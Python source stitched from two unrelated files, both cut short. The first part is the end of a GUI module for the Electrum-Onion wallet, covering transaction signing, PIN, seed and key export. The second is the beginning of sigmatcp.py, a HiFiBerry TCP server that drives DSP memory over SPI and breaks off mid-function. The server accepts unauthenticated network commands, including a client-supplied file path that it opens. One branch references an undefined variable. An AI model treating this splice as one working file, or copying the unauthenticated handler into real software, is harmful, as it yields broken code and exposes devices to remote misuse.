Clock.schedule_once(lambda dt: self._channels_dialog.update())
def is_wallet_creation_disabled(self):
return bool(self.electrum_config.get('single_password')) and self.password is None
def wallets_dialog(self):
from .uix.dialogs.wallets import WalletDialog
dirname = os.path.dirname(self.electrum_config.get_wallet_path())
d = WalletDialog(dirname, self.load_wallet_by_name, self.is_wallet_creation_disabled())
d.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
self.wallets_dialog()
elif name == 'status':
popup = Builder.load_file(KIVY_GUI_PATH + f'/uix/ui_screens/{name}.kv')
master_public_keys_layout = popup.ids.master_public_keys
for xpub in self.wallet.get_master_public_keys()[1:]:
master_public_keys_layout.add_widget(TopLabel(text=_('Master Public Key')))
ref = RefLabel()
ref.name = _('Master Public Key')
ref.data = xpub
master_public_keys_layout.add_widget(ref)
popup.open()
elif name == 'lightning_channels_dialog' and not self.wallet.can_have_lightning():
self.show_error(_("Not available for this wallet.") + "\n\n" +
_("Lightning is currently restricted to HD wallets with p2wpkh addresses."))
elif name.endswith("_dialog"):
getattr(self, name)()
else:
popup = Builder.load_file(KIVY_GUI_PATH + f'/uix/ui_screens/{name}.kv')
popup.open()
@profiler
def init_ui(self):
''' Initialize The Ux part of electrum. This function performs the basic
tasks of setting up the ui.
'''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum_onion.gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum_onion.gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_onion_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_onion_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.send_screen = None
self.receive_screen = None
self.icon = os.path.dirname(KIVY_GUI_PATH) + "/icons/electrum-onion.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
net_params = self.network.get_parameters()
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_forkpoint = chain.get_max_forkpoint()
self.blockchain_name = chain.get_name()
interface = self.network.interface
if interface:
self.server_host = interface.host
else:
self.server_host = str(net_params.server.host) + ' (connecting...)'
self.proxy_config = net_params.proxy or {}
self.update_proxy_str(self.proxy_config)
def on_network_event(self, event, *args):
self.logger.info('network event: '+ event)
if event == 'network_updated':
self._trigger_update_interfaces()
self._trigger_update_status()
elif event == 'wallet_updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'blockchain_updated':
# to update number of confirmations in history
self._trigger_update_wallet()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet: 'Abstract_Wallet'):
if self.wallet:
self.stop_wallet()
self.wallet = wallet
self.wallet_name = wallet.basename()
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return
self.use_change = self.wallet.use_change
self.electrum_config.save_last_wallet(wallet)
self.request_focus_for_main_view()
def request_focus_for_main_view(self):
if platform != 'android':
return
# The main view of the activity might be not have focus
# in which case e.g. the OS "back" button would not work.
# see #6276 (specifically "method 2" and "method 3")
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
PythonActivity.requestFocusForMainView()
def update_status(self, *dt):
if not self.wallet:
return
if self.network is None or not self.network.is_connected():
status = _("Offline")
elif self.network.is_connected():
self.num_blocks = self.network.get_local_height()
server_height = self.network.get_server_height()
server_lag = self.num_blocks - server_height
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
status = ("{} [size=18dp]({}/{})[/size]"
.format(_("Synchronizing..."), num_answered, num_sent))
elif server_lag > 1:
status = _("Server is lagging ({} blocks)").format(server_lag)
else:
status = ''
else:
status = _("Disconnected")
if status:
self.balance = status
self.fiat_balance = status
else:
c, u, x = self.wallet.get_balance()
l = int(self.wallet.lnworker.get_balance()) if self.wallet.lnworker else 0
balance_sat = c + u + x + l
text = self.format_amount(balance_sat)
self.balance = str(text.strip()) + ' [size=22dp]%s[/size]'% self.base_unit
self.fiat_balance = self.fx.format_amount(balance_sat) + ' [size=22dp]%s[/size]'% self.fx.ccy
def update_wallet_synchronizing_progress(self, *dt):
if not self.wallet:
return
if not self.wallet.up_to_date:
self._trigger_update_status()
def get_max_amount(self):
from electrum_onion.transaction import PartialTxOutput
if run_hook('abort_send', self):
return ''
inputs = self.wallet.get_spendable_coins(None)
if not inputs:
return ''
addr = None
if self.send_screen:
addr = str(self.send_screen.address)
if not addr:
addr = self.wallet.dummy_address()
outputs = [PartialTxOutput.from_address_and_value(addr, '!')]
try:
tx = self.wallet.make_unsigned_transaction(coins=inputs, outputs=outputs)
except NoDynamicFeeEstimates as e:
Clock.schedule_once(lambda dt, bound_e=e: self.show_error(str(bound_e)))
return ''
except NotEnoughFunds:
return ''
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return ''
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
return format_satoshis_plain(amount_after_all_fees, decimal_point=self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(
x,
num_zeros=0,
decimal_point=self.decimal_point(),
is_diff=is_diff,
whitespaces=whitespaces,
)
def format_amount_and_units(self, x) -> str:
if x is None:
return 'none'
if x == '!':
return 'max'
return format_satoshis_plain(x, decimal_point=self.decimal_point()) + ' ' + self.base_unit
def format_fee_rate(self, fee_rate):
# fee_rate is in sat/kB
return format_fee_satoshis(fee_rate/1000) + ' oni/byte'
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('electrum-onion', message,
app_icon=icon, app_name='electrum-onion')
except ImportError:
self.logger.Error('Notification: needs plyer; `sudo python3 -m pip install plyer`')
def on_pause(self):
self.pause_time = time.time()
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
if self.nfcscanner:
self.nfcscanner.nfc_enable()
if self.resume_dialog is not None:
return
now = time.time()
if self.wallet and self.has_pin_code() and now - self.pause_time > 5*60:
def on_success(x):
self.resume_dialog = None
d = PincodeDialog(
self,
check_password=self.check_pin_code,
on_success=on_success,
on_failure=self.stop)
self.resume_dialog = d
d.open()
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label, *, show_text_with_qr: bool = True):
if not label.data:
return
self.qr_dialog(label.name, label.data, show_text_with_qr)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon=f'atlas://{KIVY_GUI_PATH}/theming/atlas/light/error', duration=0,
modal=False):
''' Show an error Message Bubble.
'''
self.show_info_bubble(text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show an Info Message Bubble.
'''
self.show_error(error, icon=f'atlas://{KIVY_GUI_PATH}/theming/atlas/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show an Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
text = str(text) # so that we also handle e.g. Exception
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = f'atlas://{KIVY_GUI_PATH}/theming/atlas/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def show_transaction(self, txid):
tx = self.wallet.db.get_transaction(txid)
if not tx and self.wallet.lnworker:
tx = self.wallet.lnworker.lnwatcher.db.get_transaction(txid)
if tx:
self.tx_dialog(tx)
else:
self.show_error(f'Transaction not found {txid}')
def lightning_tx_dialog(self, tx):
from .uix.dialogs.lightning_tx_dialog import LightningTxDialog
d = LightningTxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
status = False
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
Clock.schedule_once(lambda dt: on_complete(status, msg))
def broadcast(self, tx):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
else:
msg = msg or ''
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
if amount == '!':
screen.is_max = True
max_amt = self.get_max_amount()
screen.amount = (max_amt + ' ' + self.base_unit) if max_amt else ''
else:
screen.amount = amount
screen.is_max = False
popup = AmountDialog(show_max, amount, cb)
popup.open()
def addresses_dialog(self):
from .uix.dialogs.addresses import AddressesDialog
if self._addresses_dialog is None:
self._addresses_dialog = AddressesDialog(self)
self._addresses_dialog.update()
self._addresses_dialog.open()
def fee_dialog(self):
from .uix.dialogs.fee_dialog import FeeDialog
fee_dialog = FeeDialog(self, self.electrum_config, self.set_fee_status)
fee_dialog.open()
def set_fee_status(self):
target, tooltip, dyn = self.electrum_config.get_fee_target()
self.fee_status = target
def on_fee(self, event, *arg):
self.set_fee_status()
def protected(self, msg, f, args):
if self.electrum_config.get('pin_code'):
msg += "\n" + _("Enter your PIN code to proceed")
on_success = lambda pw: f(*args, self.password)
d = PincodeDialog(
self,
message = msg,
check_password=self.check_pin_code,
on_success=on_success,
on_failure=lambda: None)
d.open()
else:
d = Question(
msg,
lambda b: f(*args, self.password) if b else None,
yes_str=_("OK"),
no_str=_("Cancel"),
title=_("Confirm action"))
d.open()
def delete_wallet(self):
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = self.wallet.basename()
self.protected(_("Are you sure you want to delete wallet {}?").format(basename),
self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except InvalidPassword:
self.show_error("Invalid password")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error(_("Wallet removed: {}").format(basename))
new_path = self.electrum_config.get_wallet_path(use_gui_last_wallet=True)
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Display your seed?"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
label.data = seed
if passphrase:
label.data += '\n\n' + _('Passphrase') + ': ' + passphrase
def has_pin_code(self):
return bool(self.electrum_config.get('pin_code'))
def check_pin_code(self, pin):
if pin != self.electrum_config.get('pin_code'):
raise InvalidPassword
def change_password(self, cb):
def on_success(old_password, new_password):
# called if old_password works on self.wallet
self.password = new_password
if self._use_single_password:
path = self.wallet.storage.path
self.stop_wallet()
update_password_for_directory(self.electrum_config, old_password, new_password)
self.load_wallet_by_name(path)
msg = _("Password updated successfully")
else:
self.wallet.update_password(old_password, new_password)
msg = _("Password updated for {}").format(os.path.basename(self.wallet.storage.path))
self.show_info(msg)
on_failure = lambda: self.show_error(_("Password not updated"))
d = ChangePasswordDialog(self, self.wallet, on_success, on_failure)
d.open()
def pin_code_dialog(self, cb):
if self._use_single_password and self.has_pin_code():
def on_choice(choice):
if choice == 0:
self.change_pin_code(cb)
else:
self.reset_pin_code(cb)
choices = {0:'Change PIN code', 1:'Reset PIN'}
dialog = ChoiceDialog(
_('PIN Code'), choices, 0,
on_choice,
keep_choice_order=True)
dialog.open()
else:
self.change_pin_code(cb)
def reset_pin_code(self, cb):
on_success = lambda x: self._set_new_pin_code(None, cb)
d = PasswordDialog(self,
basename = self.wallet.basename(),
check_password = self.wallet.check_password,
on_success=on_success,
on_failure=lambda: None,
is_change=False,
has_password=self.wallet.has_password())
d.open()
def _set_new_pin_code(self, new_pin, cb):
self.electrum_config.set_key('pin_code', new_pin)
cb()
self.show_info(_("PIN updated") if new_pin else _('PIN disabled'))
def change_pin_code(self, cb):
on_failure = lambda: self.show_error(_("PIN not updated"))
on_success = lambda old_pin, new_pin: self._set_new_pin_code(new_pin, cb)
d = PincodeDialog(
self,
check_password=self.check_pin_code,
on_success=on_success,
on_failure=on_failure,
is_change=True,
has_password = self.has_pin_code())
d.open()
def save_backup(self):
if platform != 'android':
backup_dir = self.electrum_config.get_backup_dir()
if backup_dir:
self._save_backup(backup_dir)
else:
self.show_error(_("Backup NOT saved. Backup directory not configured."))
return
from android.permissions import request_permissions, Permission
def cb(permissions, grant_results: Sequence[bool]):
if not grant_results or not grant_results[0]:
self.show_error(_("Cannot save backup without STORAGE permission"))
return
# note: Clock.schedule_once is a hack so that we get called on a non-daemon thread
# (needed for WalletDB.write)
backup_dir = util.android_backup_dir()
Clock.schedule_once(lambda dt: self._save_backup(backup_dir))
request_permissions([Permission.WRITE_EXTERNAL_STORAGE], cb)
def _save_backup(self, backup_dir):
try:
new_path = self.wallet.save_backup(backup_dir)
except Exception as e:
self.logger.exception("Failed to save wallet backup")
self.show_error("Failed to save wallet backup" + '\n' + str(e))
return
self.show_info(_("Backup saved:") + f"\n{new_path}")
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
try:
key = str(self.wallet.export_private_key(addr, password))
pk_label.data = key
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.protected(_("Decrypt your private key?"), show_private_key, (addr, pk_label))
def import_channel_backup(self, encrypted):
d = Question(_('Import Channel Backup?'), lambda b: self._import_channel_backup(b, encrypted))
d.open()
def _import_channel_backup(self, b, encrypted):
if not b:
return
try:
self.wallet.lnworker.import_channel_backup(encrypted)
except Exception as e:
self.logger.exception("failed to import backup")
self.show_error("failed to import backup" + '\n' + str(e))
return
self.lightning_channels_dialog()
def lightning_status(self):
if self.wallet.has_lightning():
if self.wallet.lnworker.has_deterministic_node_id():
status = _('Enabled')
else:
status = _('Enabled, non-recoverable channels')
else:
if self.wallet.can_have_lightning():
status = _('Not enabled')
else:
status = _("Not available for this wallet.")
return status
def on_lightning_status(self, root):
if self.wallet.has_lightning():
if self.wallet.lnworker.has_deterministic_node_id():
pass
else:
if self.wallet.db.get('seed_type') == 'segwit':
msg = _("Your channels cannot be recovered from seed, because they were created with an old version of Electrum. "
"This means that you must save a backup of your wallet everytime you create a new channel.\n\n"
"If you want this wallet to have recoverable channels, you must close your existing channels and restore this wallet from seed")
else:
msg = _("Your channels cannot be recovered from seed. "
"This means that you must save a backup of your wallet everytime you create a new channel.\n\n"
"If you want to have recoverable channels, you must create a new wallet with an Electrum seed")
self.show_info(msg)
elif self.wallet.can_have_lightning():
root.dismiss()
if self.wallet.can_have_deterministic_lightning():
msg = _(
"Lightning is not enabled because this wallet was created with an old version of Electrum. "
"Create lightning keys?")
else:
msg = _(
"Warning: this wallet type does not support channel recovery from seed. "
"You will need to backup your wallet everytime you create a new wallet. "
"Create lightning keys?")
d = Question(msg, self._enable_lightning, title=_('Enable Lightning?'))
d.open()
def _enable_lightning(self, b):
if not b:
return
self.wallet.init_lightning(password=self.password)
self.show_info(_('Lightning keys have been initialized.'))
|
sigmatcp.py | '''
Copyright (c) 2018 Modul 9/HiFiBerry
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
import socket
import time
import os
import sys
import logging
import hashlib
from threading import Thread
from socketserver import BaseRequestHandler, TCPServer, ThreadingMixIn
# from zeroconf import ServiceInfo, Zeroconf
import xmltodict
import configparser
import requests
from hifiberrydsp.hardware import adau145x
from hifiberrydsp.hardware.spi import SpiHandler
from hifiberrydsp.datatools import int_data
from hifiberrydsp.parser.xmlprofile import \
XmlProfile, ATTRIBUTE_VOL_CTL, ATTRIBUTE_SPDIF_ACTIVE, ATTRIBUTE_MUTE_REG
from hifiberrydsp.alsa.alsasync import AlsaSync
from hifiberrydsp.lg.soundsync import SoundSync
from hifiberrydsp import datatools
from hifiberrydsp.server.constants import \
COMMAND_READ, COMMAND_READRESPONSE, COMMAND_WRITE, \
COMMAND_EEPROM_FILE, COMMAND_CHECKSUM, COMMAND_CHECKSUM_RESPONSE, \
COMMAND_WRITE_EEPROM_CONTENT, COMMAND_XML, COMMAND_XML_RESPONSE, \
COMMAND_STORE_DATA, COMMAND_RESTORE_DATA, COMMAND_GET_META, \
COMMAND_META_RESPONSE, COMMAND_PROGMEM, COMMAND_PROGMEM_RESPONSE, \
COMMAND_DATAMEM, COMMAND_DATAMEM_RESPONSE, \
COMMAND_GPIO, \
HEADER_SIZE, \
DEFAULT_PORT
# import hifiberrydsp
# URL to notify on DSP program updates
this = sys.modules[__name__]
this.notify_on_updates = None
this.command_after_startup = None
this.dsp=None
def parameterfile():
if (os.geteuid() == 0):
return "/var/lib/hifiberry/dspparameters.dat"
else:
return os.path.expanduser("~/.hifiberry/dspparameters.dat")
def dspprogramfile():
if (os.geteuid() == 0):
logging.info(
"running as root, data will be stored in /var/lib/hifiberry")
mydir = "/var/lib/hifiberry"
else:
mydir = "~/.hifiberry"
logging.info(
"not running as root, data will be stored in ~/.hifiberry")
try:
if not os.path.isdir(mydir):
os.makedirs(mydir)
except Exception as e:
logging.error("can't creeate directory {} ({})", mydir, e)
return os.path.expanduser(mydir + "/dspprogram.xml")
def startup_notify():
if this.command_after_startup is None:
return
# TCP server still needs to start
time.sleep(2)
logging.info("calling %s", this.command_after_startup)
os.system(this.command_after_startup)
class SigmaTCPHandler(BaseRequestHandler):
checksum = None
spi = SpiHandler()
dsp = adau145x.Adau145x
dspprogramfile = dspprogramfile()
parameterfile = parameterfile()
alsasync = None
lgsoundsync = None
updating = False
xml = None
checksum_error = False
def __init__(self, request, client_address, server):
logging.debug("__init__")
BaseRequestHandler.__init__(self, request, client_address, server)
def setup(self):
logging.debug('setup')
def finish(self):
logging.debug('finish')
def handle(self):
logging.debug('handle')
finished = False
data = None
read_more = False
while not(finished):
# Read dara
try:
buffer = None
result = None
if data is None:
data = self.request.recv(65536)
if len(data) == 0:
finished = True
continue
if read_more:
logging.debug("waiting for more data")
d2 = self.request.recv(65536)
if (len(d2) == 0):
time.sleep(0.1)
data = data + d2
read_more = False
# Not an expected header?
if len(data) > 0 and len(data) < 14:
read_more = True
continue
logging.debug("received request type %s", data[0])
if data[0] == COMMAND_READ:
command_length = int.from_bytes(
data[1:5], byteorder='big')
if (command_length > 0) and (len(data) < command_length):
read_more = True
logging.debug(
"Expect %s bytes from header information (read), but have only %s",
command_length, len(data))
continue
result = self.handle_read(data)
elif data[0] == COMMAND_WRITE:
command_length = int.from_bytes(
data[3:7], byteorder='big')
logging.debug("Len (data, header info): %s %s",
len(data), command_length)
if command_length < len(data):
buffer = data[command_length:]
data = data[0:command_length]
if (command_length > 0) and (len(data) < command_length):
read_more = True
logging.debug(
"Expect %s bytes from header information (write), but have only %s",
command_length, len(data))
continue
self.handle_write(data)
result = None
elif data[0] == COMMAND_EEPROM_FILE:
filename_length = data[1]
filename = "".join(map(chr, data[14:14 + filename_length]))
result = self.write_eeprom_file(filename)
elif data[0] == COMMAND_STORE_DATA:
self.save_data_memory()
elif data[0] == COMMAND_RESTORE_DATA:
self.restore_data_memory()
elif data[0] == COMMAND_CHECKSUM:
result = self._response_packet(
COMMAND_CHECKSUM_RESPONSE, 0, 16) + \
self.program_checksum(cached=False)
elif data[0] == COMMAND_XML:
try:
data = self.get_and_check_xml()
except IOError as e:
logging.debug("IOerror when reading XML file: %s", e)
data = None
except Exception as e:
logging.debug("Unexpected error when reading XML file: %s", e)
logging.exception(e)
data = None
if data is not None:
xml_bytes = data.encode()
result = self._response_packet(
COMMAND_XML_RESPONSE, 0, len(data)) + xml_bytes
else:
result = self._response_packet(
COMMAND_XML_RESPONSE, 0, 0)
elif data[0] == COMMAND_PROGMEM:
try:
data = self.get_program_memory()
except IOError:
data = [] # empty response
# format program memory dump
dump = ""
for i in range(0, len(data), 4):
dump += "{:02X}{:02X}{:02X}{:02X}\n".format(
data[i], data[i + 1], data[i + 2], data[i + 3])
result = self._response_packet(
COMMAND_PROGMEM_RESPONSE, 0, len(dump)) + \
dump.encode('ascii')
elif data[0] == COMMAND_GPIO:
logging.error("GPIO command not yet implemented")
elif data[0] == COMMAND_DATAMEM:
try:
data = self.get_data_memory()
except IOError:
data = [] # empty response
# format program memory dump
dump = ""
for i in range(0, len(data), 4):
dump += "{:02X}{:02X}{:02X}{:02X}\n".format(
data[i], data[i + 1], data[i + 2], data[i + 3])
result = self._response_packet(
COMMAND_DATAMEM_RESPONSE, 0, len(dump)) + \
dump.encode('ascii')
elif data[0] == COMMAND_GET_META:
length = int.from_bytes(data[1:5], byteorder='big')
if length < len(data):
buffer = data[command_length:]
data = data[0:command_length]
attribute = data[14:length].decode("utf-8")
value = self.get_meta(attribute)
logging.debug("metadata request for %s = %s",
attribute, value)
if value is None:
value = ""
value = value.encode('utf-8')
result = self._response_packet(
COMMAND_META_RESPONSE, 0, len(value))
result += value
elif data[0] == COMMAND_WRITE_EEPROM_CONTENT:
command_length = int.from_bytes(
data[3:7], byteorder='big')
logging.debug("Len (data, header info): %s %s",
len(data), command_length)
if command_length < len(data):
buffer = data[command_length:]
data = data[0:command_length]
if (command_length > 0) and (len(data) < command_length):
read_more = True
logging.debug(
"Expect %s bytes from header information (write), but have only %s", command_length, len(data))
continue
result = self.write_eeprom_content(data[14:command_length])
if (result is not None) and (len(result) > 0):
logging.debug(
"Sending %s bytes answer to client", len(result))
self.request.send(result)
# Still got data that hasn't been processed?
if buffer is not None:
data = buffer
else:
data = None
except ConnectionResetError:
finished = True
except BrokenPipeError:
finished = True
@staticmethod
def read_xml_profile():
SigmaTCPHandler.xml = XmlProfile(SigmaTCPHandler.dspprogramfile)
cs = SigmaTCPHandler.xml.get_meta("checksum")
logging.debug("checksum from XML: %s", cs)
SigmaTCPHandler.checksum_xml = None
if cs is not None:
SigmaTCPHandler.checksum_xml = bytearray()
for i in range(0, len(cs), 2):
octet = int(cs[i:i + 2], 16)
SigmaTCPHandler.checksum_xml.append(octet)
checksum_mem = SigmaTCPHandler.program_checksum()
checksum_xml = SigmaTCPHandler.checksum_xml
logging.info("checksum memory: %s, xmlfile: %s",
checksum_mem,
checksum_xml)
if (checksum_xml is not None) and (checksum_xml != 0):
if (checksum_xml != checksum_mem):
logging.error("checksums do not match, aborting")
SigmaTCPHandler.checksum_error = True
return
else:
logging.info("DSP profile doesn't have a checksum, "
"might be different from the program running now")
SigmaTCPHandler.checksum_error = False
@staticmethod
def get_checked_xml():
if not(SigmaTCPHandler.checksum_error):
if SigmaTCPHandler.xml is None:
SigmaTCPHandler.read_xml_profile()
return SigmaTCPHandler.xml
else:
logging.debug("XML checksum error, ignoring XML file")
return None
@staticmethod
def get_and_check_xml():
return str(SigmaTCPHandler.get_checked_xml())
@staticmethod
def get_meta(attribute):
if attribute=="detected_dsp":
return this.dsp
try:
xml = SigmaTCPHandler.get_checked_xml()
except:
return None
if xml is None:
return None
else:
try:
return xml.get_meta(attribute)
except:
logging.error("can't get attribute %s from XML", attribute)
return None
@staticmethod
def handle_read(data):
addr = int.from_bytes(data[10:12], byteorder='big')
length = int.from_bytes(data[6:10], byteorder='big')
logging.debug("Handle read %s/%s",addr,length)
spi_response = SigmaTCPHandler.spi.read(addr, length)
logging.debug("read {} bytes from {}".format(length, addr))
res = SigmaTCPHandler._response_packet(COMMAND_READRESPONSE,
addr,
len(spi_response)) + spi_response
return res
@staticmethod
def handle_write(data):
if len(data) < 14:
logging.error("Got incorrect write request, length < 14 bytes")
return None
addr = int.from_bytes(data[12:14], byteorder='big')
length = int.from_bytes(data[8:12], byteorder='big')
if (length == 0):
# Client might not implement length correctly and leave
# it empty
length = len(data) - 14
_safeload = data[1] # TODO: use this
if addr == SigmaTCPHandler.dsp.KILLCORE_REGISTER and not(SigmaTCPHandler.updating):
logging.debug(
"write to KILLCORE seen, guessing something is updating the DSP")
SigmaTCPHandler.prepare_update()
logging.debug("writing {} bytes to {}".format(length, addr))
memdata = data[14:]
res = SigmaTCPHandler.spi.write(addr, memdata)
if addr == SigmaTCPHandler.dsp.HIBERNATE_REGISTER and \
SigmaTCPHandler.updating and memdata == b'\00\00':
logging.debug(
"set HIBERNATE to 0 seen, guessing update is done")
SigmaTCPHandler.finish_update()
return res
@staticmethod
def write_eeprom_content(xmldata):
logging.info("writing XML file: %s", xmldata)
try:
doc = xmltodict.parse(xmldata)
SigmaTCPHandler.prepare_update()
for action in doc["ROM"]["page"]["action"]:
instr = action["@instr"]
if instr == "writeXbytes":
addr = int(action["@addr"])
paramname = action["@ParamName"]
data = []
for d in action["#text"].split(" "):
value = int(d, 16)
data.append(value)
logging.debug("writeXbytes %s %s", addr, len(data))
SigmaTCPHandler.spi.write(addr, data)
# Sleep after erase operations
if ("g_Erase" in paramname):
logging.debug(
"found erase command, waiting 10 seconds to finish")
time.sleep(10)
# Delay after a page write
if ("Page_" in paramname):
logging.debug(
"found page write command, waiting 0.5 seconds to finish")
time.sleep(0.5)
if instr == "delay":
logging.debug("delay")
time.sleep(1)
SigmaTCPHandler.finish_update()
# Write current DSP profile
with open(SigmaTCPHandler.dspprogramfile, "w+b") as dspprogram:
if (isinstance(xmldata, str)):
xmldata = xmldata.encode("utf-8")
dspprogram.write(xmldata)
except Exception as e:
logging.error("exception during EEPROM write: %s", e)
logging.exception(e)
return b'\00'
return b'\01'
@staticmethod
def write_eeprom_file(filename):
try:
with open(filename) as fd:
data = fd.read()
return SigmaTCPHandler.write_eeprom_content(data)
except IOError as e:
logging.debug("IOError: %s", e)
return b'\00'
@staticmethod
def save_data_memory():
logging.info("store: getting checksum")
checksum = SigmaTCPHandler.program_checksum()
memory = SigmaTCPHandler.get_memory_block(SigmaTCPHandler.dsp.DATA_ADDR,
SigmaTCPHandler.dsp.DATA_LENGTH)
logging.info("store: writing memory dump to file")
SigmaTCPHandler.store_parameters(checksum, memory)
@staticmethod
def restore_data_memory():
